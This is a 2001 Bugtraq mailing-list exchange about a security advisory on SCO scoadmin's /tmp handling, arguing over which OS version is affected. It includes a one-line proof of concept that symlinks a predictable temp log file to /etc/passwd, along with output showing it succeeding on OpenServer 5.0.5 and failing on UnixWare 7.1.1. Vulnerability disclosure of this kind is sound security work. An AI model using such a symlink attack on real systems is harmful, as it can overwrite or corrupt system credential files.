[20749] in bugtraq
Re: [SRT2001-10] - scoadmin /tmp issues
daemon@ATHENA.MIT.EDU (KRFinisterre@checkfree.com)
Wed May 23 21:01:08 2001
To: Matt Schalit <mschalit@pacbell.net>
Cc: bugtraq@securityfocus.com, "Recon@Snosoft. Com" <recon@snosoft.com>,
Richard Johnson <thief@snosoft.com>
Message-ID: <OF4DD154DD.879E2C4A-ON85256A55.00626F1A@ckfr.com>
From: KRFinisterre@checkfree.com
Date: Wed, 23 May 2001 13:56:35 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
I am sorry it was a typo the os is as follows.
SCO_SV unixdev 3.2 5.0.5 i386
$ ln -s /etc/passwd /tmp/tclerror.1195.log
$ ls -al /tmp/tclerror.1195.log
lrwxrwxrwx 1 kevin supp 11 May 23 13:47
/tmp/tclerror.1195.log -> /etc/passwd
Matt Schalit
<mschalit@pac To: Richard Johnson <thief@snosoft.com>
bell.net> cc: bugtraq@securityfocus.com,
"Recon@Snosoft. Com" <recon@snosoft.com>
05/23/01 Subject: Re: [SRT2001-10] - scoadmin /tmp
01:39 PM issues
Hello Sir:
Richard Johnson wrote:
>
> ======================================================================
> Strategic Reconnaissance Team Security Advisory(SRT2001-09)
> Topic: scoadmin /tmp issues
> Vendor: Santa Cruz Operations
> Release Date: 05/07/01
> ======================================================================
[snip...]
> .: Systems Affected
> Unixware 5.x
You bring to light various issues with software issued by the
"Santa Cruz Operations" (sic). I'm sure they would prefer that
you call them by their correct name, the Santa Cruz Operation, or
simple SCO.
The SCO server division has been acquired by Caldera, and
www.sco.com now points you to Caldera, for those of you who
may not know.
SCO has two OS lines that have the following release history:
UnixWare OpenServer
------------------ --------------------------
... ...
Unixware 2.1.2 Unix System 5 Release 3.2v4.0
Unixware 2.1.3 Unix System 5 Release 3.2.4.2
Unixware 7.0.0 OpenServer 5.0.0
Unixware 7.0.1 OpenServer 5.0.2
Unixware 7.1.0 OpenServer 5.0.4
Unixware 7.1.1 <-- Current OpenServer 5.0.5
OpenServer 5.0.6 <--- Current.
I spent about 15 minutes searching the net and the ng's for any reference
to a "UnixWare 5" or a "UnixWare 5.x" that you refer to with no success.
Would you please clarify for the rest of us exactly what OS you
see this problem with. Please include the output of
uname -a
> .: Proof of Concept
> ln -s /etc/passwd /tmp/tclerror.1195.log
This doesn't work on UnixWare 7.1.1.
$ ln -s /etc/passwd /tmp/tclerror.1195.log
UX:ln: ERROR: Cannot create /tmp/tclerror.1195.log: Not privileged
Regards,
Matthew Schalit
SCO ACE, Maintainer of the Uw7 FAQ.
